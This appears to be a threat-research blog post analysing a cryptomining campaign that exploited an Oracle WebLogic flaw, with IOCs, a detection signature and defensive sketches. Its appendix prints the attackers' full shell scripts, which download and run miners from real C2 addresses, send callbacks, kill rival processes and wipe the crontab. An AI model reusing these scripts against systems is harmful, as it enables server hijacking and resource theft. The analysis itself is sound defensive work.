Coin Mining by Opportunistic and Automated Threats
With the recent surge in popularity and increasing value of cryptocurrency, it should be no surprise that financially motivated threat actors have begun leveraging their victims to contribute to “mining” efforts, where the computing resources of the victim are used to generate cryptocurrency for the threat actor. To succeed in making a large profit, the actors must continually compromise a large number of victims and utilize significant computing resources. This demand for mass compromise has forced these threat actors to adopt automated methods that rely on opportunistic exploitation to outpace defenders, increasing the number of victims as quickly as possible with minimal cost.
While on the surface, the business impact from coin mining seems minimal, having an unauthorized party in control of systems you own introduces a dangerous wild card. Is it really a criminal performing coin mining or is that a disguise? What will they do with the access if coin mining is no longer profitable? The Gigamon Applied Threat Research (ATR) team has witnessed incidents stemming from criminals who decided to sell their access to other parties, and the increasingly common malware-as-a-service scheme contributes to the risk from “simple” coin mining. Simply stated, criminal post-exploitation has become an efficient and widespread business that poses a threat to all enterprises, especially those with a significant and historical internet footprint that may contain undocumented or obsolete systems and pages. In this post, we will provide a walkthrough of an attack campaign that the Gigamon ATR team has witnessed in the wild over the past several weeks and break down some key lessons learned from the attack.
Attack Walkthrough
Exploitation
Attackers primarily rely on opportunistic exploitation of well-known (and signatured) vulnerabilities in applications running on internet-connected systems, and exhibit complete disregard for stealth or disguise. Throughout the recently observed campaign, attackers originating from multiple source addresses (191.101.180[.]84, 72.11.140[.]178) leveraged CVE-2017-10271, a Java deserialization vulnerability in the Oracle WebLogic Server, to target outdated servers (Figure 1). Java deserialization vulnerabilities are not unique to Oracle, and plague several older versions of WebSphere, JBoss, Jenkins, OpenNMS, etc. In this class of vulnerability, server software attempts to deserialize untrusted content without validation, allowing an attacker to abuse the application for code execution.
Tool Staging
Following exploitation of the system, the threat actor downloads and executes a shell script from their command and control (C2) server using Wget. Throughout the campaign, we observed several variations of the same tool (Table 1), each progressively adding capabilities or cleanup mechanisms. This indicates the possibility that the tool is either a public script that is getting reused and built upon, or that this campaign is more far-reaching than the Gigamon ATR team has independently observed to this point.
Identifier | Hosted URL | SHA1 Hash |
---|---|---|
Version A | http://72.11.140[.]178/setup-watch | df62241026a96cda6057d894000de8ed70b3b666 |
Version B | http://191.101.180[.]84:80/robots.txt | 4c3f1cc052f7216447df8954a55e373bdf2ecefc |
In Version B, the Gigamon ATR team observed that the script performs two major actions: cleanup and staging of tools. During the cleanup routine, the script makes extensive attempts to prevent multiplicative effects, killing active processes of previously running code, other coin miners on the system, or system utilities that might be used to detect the action. During the staging phase, the script runs two similar routines that download two different files from different URIs, grant executable permissions, and attempt to execute these files. Both files are downloaded to the path ‘/tmp/xfsallocd’. The script then sends a follow-on signal to the controller, via an HTTP request from the download utility to a specific URI, to indicate whether the file was already running or was successfully started. Figure 2 shows the complete network staging process without the signal for successful execution. For a complete review of the source code, please reference Appendix B.
Profit
The executable binaries that are downloaded during staging are publicly known and identified Monero Coin Miners (Table 2). Analysis of the binaries shows they are using the standard stratum connection string “stratum+tcp://pool.minexmr.com:80” with a wallet ID of “4AQe5sAFWZKECiaeNTt59LG7kVtqRoSRJMjrmQ6GiMFAeUvoL3MFeTE6zwwHkFPrAyNw2JHDxUSWL82RiZThPpk4SEg7Vqe”.
Analysis of the wallet associated with this activity shows that the threat actor(s) have been paid out a total of 603.535663865 XMR, which, at the current exchange rate, equates to approximately $260,000 (note that, with cryptocurrency price fluctuations, this number is purely a point-in-time estimate).
Download URI | Local File Name | SHA1 Hash |
---|---|---|
$HOST/files/l/default | /tmp/xfsallocd, /tmp/watch-smartd | f79a2ba735a988fa6f65988e1f3d39684727bdc4 |
$HOST/files/l/others | /tmp/xfsallocd, /tmp/watch-smartd | 7c57c61664f2b2373f755f22db9c156a1ca80849 |
It is also worth noting that as of Jan 4, 2017, AlienVault published a signature to the public Emerging Threats feed (Figure 3) to identify activity with the associated wallet ID for this threat actor.
alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"ET CURRENT_EVENTS CoinMiner? Malicious Authline Seen After CVE-2017-10271 Exploit"; flow:established,to_server; content:"{|22|id|22 3A|"; depth:6; content:"|22|method|22 3a 20 22|mining.authorize|22 2c|"; within:100; content:"|22|params|22|"; within:50; content:"|5b 22|4AQe5sAFWZKECiaeNTt59LG7kVtqRoSRJMjrmQ6GiMFAeUvoL3MFeTE6zwwHkFPrAyNw2JHDxUSWL82RiZThPpk4SEg7Vqe|22 2c 20 22|"; distance:0; metadata: former_category CURRENT_EVENTS; reference:url,otx.alienvault.com/pulse/5a4e1c4993199b299f90a212; classtype:trojan-activity; sid:2025186; rev:1; metadata:attack_target Web_Server, deployment Datacenter, signature_severity Major, created_at 2018_01_04, malware_family CoinMiner?, performance_impact Low, updated_at 2018_01_04;)
Figure 3: Emerging Threats Signature ID 2025186.
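The signature in Figure 3 pins one wallet ID and one exact JSON spacing. As an added example (not part of the original post and not AlienVault's or Gigamon's code), the sketch below generalizes it: it parses newline-delimited stratum JSON from a client-to-server payload, reports any mining.authorize login, and flags wallets on a watchlist. The function name, the sample payloads and the rule for trimming a worker suffix from the login string are assumptions.

```python
import json
import re

# Wallet ID reported in this post for the campaign.
CAMPAIGN_WALLET = ("4AQe5sAFWZKECiaeNTt59LG7kVtqRoSRJMjrmQ6GiMF"
                   "AeUvoL3MFeTE6zwwHkFPrAyNw2JHDxUSWL82RiZThPpk4SEg7Vqe")
WATCHLIST = {CAMPAIGN_WALLET}

# Constructed payloads (not captured traffic).
# 1) Same layout the Figure 3 signature expects.
SIG_STYLE = ('{"id": 1, "method": "mining.authorize", "params": ["%s", "x"]}\n'
             % CAMPAIGN_WALLET).encode()
# 2) Different key order, no spaces, unknown wallet with a worker suffix:
#    a byte-pattern signature tied to one wallet would not fire on this.
VARIANT = (b'{"params":["44ExampleWalletConstructed.rig01","x"],'
           b'"method":"mining.authorize","id":2}\n')
# 3) Unrelated traffic.
HTTP = b"GET /index.html HTTP/1.1\r\nHost: example.test\r\n\r\n"


def find_authorize(payload: bytes):
    """Return one dict per stratum mining.authorize message in the payload."""
    hits = []
    for line in payload.splitlines():
        line = line.strip()
        if not line.startswith(b"{"):
            continue  # stratum messages are one JSON object per line
        try:
            msg = json.loads(line)
        except ValueError:  # malformed JSON or undecodable bytes
            continue
        if not isinstance(msg, dict) or msg.get("method") != "mining.authorize":
            continue
        params = msg.get("params")
        if not (isinstance(params, list) and params
                and isinstance(params[0], str)):
            continue
        # Assumption: the wallet is the leading alphanumeric run of the
        # login string; anything after "." or "+" is a worker/difficulty tag.
        m = re.match(r"[0-9A-Za-z]+", params[0])
        wallet = m.group(0) if m else params[0]
        hits.append({"wallet": wallet, "on_watchlist": wallet in WATCHLIST})
    return hits


if __name__ == "__main__":
    for name, data in (("sig-style", SIG_STYLE), ("variant", VARIANT),
                       ("http", HTTP)):
        print(name, find_authorize(data))
```

Wallets extracted this way can be used as pivot points in the same manner as the wallet ID discussed in the Analysis section.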
Analysis
As part of our investigations, the Gigamon ATR team’s analysts were able to identify additional related activity across our customer space and in the public domain. The primary points of pivot were signatures developed to match the Linux scripts, infrastructure analysis, open source intelligence gathering, and the wallet ID tied to the threat actor observed in the aforementioned campaign. By pivoting on these indicators, the Gigamon ATR team discovered the following:
- Fourteen additional Linux shell script variants that had variations of the downloader string, host IP address, and coin miner file paths
- Three variants of Windows PowerShell scripts that mirror the functionality of the observed Linux scripts
- Two additional servers performing exploitation activity
- Thirteen Windows XMRig coin miner variants customized for this campaign
All indicators discovered during this activity are provided and identified in Appendix A.
Lessons Learned
It is easy to look at this relatively simple activity and judge the attackers' tradecraft as almost too simple for an enterprise to be susceptible to. However, criminals are able to compromise a large number of victims and profit from the activity. The above illustrates once again that:
- Visibility and knowledge of your internet footprint is vital
- Multi-layered detection strategies provide a robust means to discover malicious activity
- Forensics and root cause analysis are critical for long term continuity of business operations during incidents
Visibility and Knowledge of Your Internet Footprint Is Vital
If the successful exploitation of outdated and exposed assets provides the threat actor a form of revenue, it is likely they will continue to use these techniques. Knowledge of your asset inventory, application versioning, and attack surface will help you to better prevent, detect, and respond. In the case of many outdated or legacy *nix-based systems, it is unlikely that any sort of endpoint detection or response software will be supported, increasing the need for widespread network visibility and accountability over these endpoints.
Multi-Layered Detection Strategies Provide a Robust Means to Discover Malicious Activity
Simply alerting on the IOCs provided in this post will serve as an initial layer of detection, but organizations should strive for more reliable indicators of malicious activity. In the case of this specific incident, there are numerous key detection points. Examples of these include:
- Atomic Indicators: Threat intelligence matching on the servers, threat intel matching on the downloaded binaries, coin mining network activity, etc.
- Complex Indicators: Executables downloaded with a suspicious user-agent, interaction with internet-exposed systems from “newly observed” low-reputation entities, executables downloaded immediately following an exploit attempt, etc.
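The "executables downloaded immediately following an exploit attempt" indicator can be written as a correlation over network events. The following is an added example, not Gigamon's detection logic: the event format, field names, five-minute window, addresses and sample records are constructed, while the payload URIs and callback codes are taken from the scripts in Attachment B.

```python
from datetime import datetime, timedelta
from urllib.parse import urlsplit, parse_qs

WINDOW = timedelta(minutes=5)  # assumed correlation window

# Callback codes sent by the DEFAULT/OTHERS routines in Attachment B.
CALLBACKS = {
    "l60": "default payload started",
    "l69": "default payload already running",
    "l30": "others payload started",
    "l39": "others payload already running",
}
PAYLOAD_URIS = {"/files/l/default", "/files/l/others",
                "/files/w/default", "/files/w/others"}
TOOL_AGENTS = ("wget", "curl")  # downloaders used by the script variants

# Constructed events (not real telemetry); all addresses are placeholders.
WGET = "Wget/1.12 (linux-gnu)"
EVENTS = [
    {"ts": "2018-01-05T10:00:00", "type": "ids_alert",
     "src": "198.51.100.7", "dst": "10.0.0.5", "sig": "CVE-2017-10271"},
    {"ts": "2018-01-05T10:00:02", "type": "http", "src": "10.0.0.5",
     "dst": "198.51.100.7", "uri": "/robots.txt", "user_agent": WGET},
    {"ts": "2018-01-05T10:00:03", "type": "http", "src": "10.0.0.5",
     "dst": "198.51.100.7", "uri": "/files/l/default", "user_agent": WGET},
    {"ts": "2018-01-05T10:00:05", "type": "http", "src": "10.0.0.5",
     "dst": "198.51.100.7", "uri": "/?info=l60", "user_agent": WGET},
    # No preceding alert for this host: ignored.
    {"ts": "2018-01-05T10:30:00", "type": "http", "src": "10.0.0.9",
     "dst": "203.0.113.20", "uri": "/repo/pkg.rpm", "user_agent": WGET},
    # Same server, but long after the alert: outside the window.
    {"ts": "2018-01-05T12:00:00", "type": "http", "src": "10.0.0.5",
     "dst": "203.0.113.20", "uri": "/updates", "user_agent": WGET},
]


def parse_ts(value):
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%S")


def correlate(events, window=WINDOW):
    """Map each server to the tool-driven outbound requests it made
    within `window` of an inbound exploit alert."""
    alerts = {}    # server address -> time of most recent exploit alert
    findings = {}
    for ev in sorted(events, key=lambda e: e["ts"]):
        ts = parse_ts(ev["ts"])
        if ev["type"] == "ids_alert":
            alerts[ev["dst"]] = ts
            continue
        alert_ts = alerts.get(ev["src"])
        if alert_ts is None or ts - alert_ts > window:
            continue  # not close to an exploit attempt
        if not ev.get("user_agent", "").lower().startswith(TOOL_AGENTS):
            continue  # only command-line downloaders are of interest here
        url = urlsplit(ev["uri"])
        code = parse_qs(url.query).get("info", [""])[0]
        if code in CALLBACKS:
            what = "callback: " + CALLBACKS[code]
        elif url.path in PAYLOAD_URIS:
            what = "payload download: " + url.path
        else:
            what = "tool download: " + url.path
        findings.setdefault(ev["src"], []).append(what)
    return findings


if __name__ == "__main__":
    for host, items in correlate(EVENTS).items():
        print(host, items)
```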
Forensics and Root Cause Analysis Are Critical for Long Term Continuity of Business Operations During Incidents
Even if successfully detected, a failure to contain or remediate the activity will likely lead to continued exploitation. In the case of interactive threat actors, an incomplete remediation will also provide a significant tip-off of your knowledge of their presence. Consider the scenario where you detect the activity, perform forensics to validate that no additional exploitation has occurred, and move to reimage the system for business continuity. Proper removal can be a time consuming and intricate process that may be best handled by bringing in an Incident Response team to ensure complete remediation.
Gigamon Insight is a network security analytics solution that offers a SaaS capability that enables customers to gain and utilize widespread network visibility for security operations. As part of its research, the Gigamon ATR team coordinates disclosure of security threats and vulnerabilities with relevant parties in order to maximize both the response and victim remediation efforts as well as working to truly improve the security of customers and other victims prior to publishing blog posts.
Attachment A: Indicators of Compromise
Indicator | Type | Description |
---|---|---|
72.11.140[.]178 | IP Address | Server for exploitation and tool staging observed by ICEBRG |
72.11.140[.]179 | IP Address | Server for exploitation and tool staging identified via secondary analysis |
72.11.140[.]180 | IP Address | Server for exploitation and tool staging identified via secondary analysis |
191.101.180[.]84 | IP Address | Server for exploitation and tool staging identified via secondary analysis |
/files/l/default | URI | URI of “default” coin mining malware |
/files/l/others | URI | URI of “others” coin mining malware |
carbon | Filename | Name of downloaded file, typically in /tmp or working dir |
infoed | Filename | Name of downloaded file, typically in /tmp or working dir |
ksxworker | Filename | Name of downloaded file, typically in /tmp or working dir |
rcp_bh | Filename | Name of downloaded file, typically in /tmp or working dir |
watch_smartd | Filename | Name of downloaded file, typically in /tmp or working dir |
xfsallocd | Filename | Name of downloaded file, typically in /tmp or working dir |
xlog-daemon | Filename | Name of downloaded file, typically in /tmp or working dir |
auto-upgrade.exe | Filename | Windows filename for XMRig. Stored in path ‘$env:TMP’ |
/files/w/default | URI | URI of hosted “default” XMRig binary for Windows |
/files/w/others | URI | URI of hosted “other” XMRig binary for Windows |
Differential Analysis of Linux Shell Scripts
SHA1 Hash | Downloader | Host | Local File |
---|---|---|---|
9c2d266e880848a3f08dcceee0d27a660c521ac5 | curl | 72.11.140[.]178 | /tmp/rcp_bh |
ca9fad2fe12b5231ae42f507afbb00a742b2e3d2 | wget -q -O - | 72.11.140[.]178 | /tmp/infoed |
abc8be4e557107e80c1c342b7505dd3d2e47ef7f | wget -q -O - | 191.101.180[.]84 | `pwd`/xfsallocd /tmp/xfsallocd |
e843c894d837a41f5f9f2bcf932d1c5e49afe08b | wget -q -O - | 191.101.180[.]84 | `pwd`/xfsallocd /tmp/xfsallocd |
07133903f1c38e653e39f9877dca9575699e807d | wget -q -O - | 72.11.140[.]178 | /tmp/carbon |
68039309925c8804fa745173cc8805938f3e3184 | curl | 72.11.140[.]178 | /tmp/infoed |
25c804e082a4adc01bfcbc19704f541c7026fa9b | wget -q -O - | 72.11.140[.]180 | `pwd`/xlog-daemon |
0b4f904cebd469abff43f0457ab6a77466453173 | wget -q -O - | 72.11.140[.]178 | /tmp/rcp_bh |
c0b76bca13da6989f05c4aeac59029c3987d7f98 | wget -q -O - | 191.101.180[.]84 | `pwd`/xfsallocd /tmp/xfsallocd |
3909125fd2ddca0aff8130115ef8b870e508e795 | curl | 191.101.180[.]84 | /tmp/xfsallocd |
348d1b3a54dc89250531258fe822e3a948dbc071 | wget -q -O - | 72.11.140[.]178 | `pwd`/rcp_bh |
b4771410fe5bf3825df41735820aeaeff3c685bb | curl | 72.11.140[.]178 | /tmp/infoed |
13736cfc4df64a9890c4474f0003a54a8b72ffe2 | curl | 72.11.140[.]178 | `pwd`/rcp_bh |
5249dadfea25acaeb66a0f1798ac2f09a41f2449 | wget -q -O - | 72.11.140[.]179 | /tmp/ksxworker |
df62241026a96cda6057d894000de8ed70b3b666 | wget -q -O - | 72.11.140[.]178 | /tmp/watch-smartd |
4c3f1cc052f7216447df8954a55e373bdf2ecefc | wget -q -O - | 191.101.180[.]84 | /tmp/xfsallocd |
Attachment B: Script Source Code
Version A
HOST=72.11.140.178
CALLBACK=$HOST
# DOWNLOADER="curl "
DOWNLOADER="wget -q -O - "
DEFAULT_RFILE=$HOST/files/l/default
OTHERS_RFILE=$HOST/files/l/others
LFILE_NAME="watch-smartd"
# LFILE_PATH=`pwd`/$LFILE_NAME
LFILE_PATH=/tmp/$LFILE_NAME
DEFAULT ()
{
$DOWNLOADER $DEFAULT_RFILE > $LFILE_PATH
chmod +x $LFILE_PATH
ps -ef|grep $LFILE_NAME|grep -v grep
if [ $? -ne 0 ]; then
$LFILE_PATH -B && $DOWNLOADER "${CALLBACK}/?info=l60"
else
$DOWNLOADER "${CALLBACK}/?info=l69"
fi
}
OTHERS ()
{
$DOWNLOADER $OTHERS_RFILE > $LFILE_PATH
chmod +x $LFILE_PATH
ps -ef|grep $LFILE_NAME|grep -v grep
if [ $? -ne 0 ]; then
$LFILE_PATH -B && $DOWNLOADER "${CALLBACK}/?info=l30"
else
$DOWNLOADER "${CALLBACK}/?info=l39"
fi
}
DEFAULT || OTHERS
Version B
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
HOST=191.101.180.84
CALLBACK=$HOST
# DOWNLOADER="curl "
DOWNLOADER="wget -q -O - "
LFILE_NAME="xfsallocd"
# LFILE_PATH=`pwd`/$LFILE_NAME
LFILE_PATH=/tmp/$LFILE_NAME
DEFAULT_RFILE=$HOST/files/l/default
OTHERS_RFILE=$HOST/files/l/others
CLEAN ()
{
RMLIST=(/tmp/*index_bak* /tmp/*httpd.conf* /tmp/*httpd.conf /tmp/a7b104c270 /tmp/Carbon)
KILIST=(sb1 wipefs AnXqV.yam [email protected] monerohash.com /tmp/a7b104c270 stratum.f2pool.com:8888 42HrCwmHSVyJSAQwn6Lifc3WWAWN56U8s2qAbm6BAagW6Ryh8JgWq8Q1JbZ8nXdcFVgnmAM3q86cm5y9xfmvV1ap6qVvmPe 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQt989KEfGRt6Ww2Xg8 46SDR76rJ2J6MtmP3ZZKi9cEA5RQCrYgag7La3CxEootQeAQULPE2CHJQ4MRZ5wZ1T73Kw6Kx4Lai2dFLAacjerbPzb5Ufg 42HrCwmHSVyJSAQwn6Lifc3WWAWN56U8s2qAbm6BAagW6Ryh8JgWq8Q1JbZ8nXdcFVgnmAM3q86cm5y9xfmvV1ap6qVvmPe xmrpool.eu mine.moneropool.com xmr.crypto-pool.fr:8080 xmr.crypto-pool.fr:3333 xmr.crypto-pool.fr:6666 xmr.crypto-pool.fr:7777 xmr.crypto-pool.fr:443)
for item in ${RMLIST[@]}
do
rm -rf $item
done
for item in ${KILIST[@]}
do
ps auxf|grep -v grep|grep $item|awk '{print $2}'|xargs kill -9
done
days=$(($(date +%s) / 60 / 60 / 24))
ps auxf|grep -v grep|grep "42HrCwmHSVyJSAQwn6Lifc3WWAWN56U8s2qAbm6BAagW6Ryh8JgWq8Q1JbZ8nXdcFVgnmAM3q86cm5y9xfmvV1ap6qVvmPe"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep ${days}|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "logind.conf"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "cryptonight"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "kworker"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "Silence"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "45hsTaSqTQM4K1Xeqkcy7eLzqdEuQ594fJVmQryCemQSCU878JGQdSDCxbhNyVjSkiaYat8yAfBuRTPSEUPZoARm9a5XEHZ"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "47sghzufGhJJDQEbScMCwVBimTuq6L5JiRixD8VeGbpjCTA12noXmi4ZyBZLc99e66NtnKff34fHsGRoyZk3ES1s1V4QVcB"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "44iuYecTjbVZ1QNwjWfJSZFCKMdceTEP5BBNp4qP35c53Uohu1G7tDmShX1TSmgeJr2e9mCw2q1oHHTC2boHfjkJMzdxumM"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "t.sh"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "wipefs"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "carbon"|awk '{print $2}'|xargs kill -9
pkill -f 49hNrEaSKAx5FD8PE49Wa3DqCRp2ELYg8dSuqsiyLdzSehFfyvk4gDfSjTrPtGapqcfPVvMtAirgDJYMvbRJipaeTbzPQu4
pkill -f 4AniF816tMCNedhQ4J3ccJayyL5ZvgnqQ4X9bK7qv4ZG3QmUfB9tkHk7HyEhh5HW6hCMSw5vtMkj6jSYcuhQTAR1Sbo15gB
pkill -f 4813za7ePRV5TBce3NrSrugPPJTMFJmEMR9qiWn2Sx49JiZE14AmgRDXtvM1VFhqwG99Kcs9TfgzejAzT9Spm5ga5dkh8df
pkill -f cpuloadtest
pkill -f crypto-pool
pkill -f xmr
pkill -f prohash
pkill -f monero
pkill -f miner
pkill -f nanopool
pkill -f minergate
pkill -f yam
pkill -f Silence
pkill -f yam2
pkill -f minerd
pkill -f Circle_MI.png
pkill -f curl
ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "crypto-pool"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "prohash"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "monero"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "miner"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "nanopool"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "minergate"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:3333"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:443"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "[email protected]"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "stratum"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "44pgg5mYVH6Gnc7gKfWGPR2CxfQLhwdrCPJGzLonwrSt5CKSeEy6izyjEnRn114HTU7AWFTp1SMZ6eqQfvrdeGWzUdrADDu"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "42HrCwmHSVyJSAQwn6Lifc3WWAWN56U8s2qAbm6BAagW6Ryh8JgWq8Q1JbZ8nXdcFVgnmAM3q86cm5y9xfmvV1ap6qVvmPe"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "49JsSwt7MsH5m8DPRHXFSEit9ZTWZCbWwS7QSMUTcVuCgwAU24gni1ydnHdrT9QMibLtZ3spC7PjmEyUSypnmtAG7pyys7F"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "479MD1Emw69idbVNKPtigbej7x1ZwFR1G3boyXUFfAB89uk2AztaMdWVd6NzCTfZVpDReKEAsVVBwYpTG8fsRK3X17jcDKm"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "11231"|awk '{print $2}'|xargs kill -9
}
DEFAULT ()
{
$DOWNLOADER $DEFAULT_RFILE > $LFILE_PATH
chmod +x $LFILE_PATH
ps -ef|grep $LFILE_NAME|grep -v grep
if [ $? -ne 0 ]; then
$LFILE_PATH -B && $DOWNLOADER "${CALLBACK}/?info=l60"
else
$DOWNLOADER "${CALLBACK}/?info=l69"
fi
}
OTHERS ()
{
$DOWNLOADER $OTHERS_RFILE > $LFILE_PATH
chmod +x $LFILE_PATH
ps -ef|grep $LFILE_NAME|grep -v grep
if [ $? -ne 0 ]; then
$LFILE_PATH -B && $DOWNLOADER "${CALLBACK}/?info=l30"
else
$DOWNLOADER "${CALLBACK}/?info=l39"
fi
}
CLEAN
DEFAULT || OTHERS
crontab -r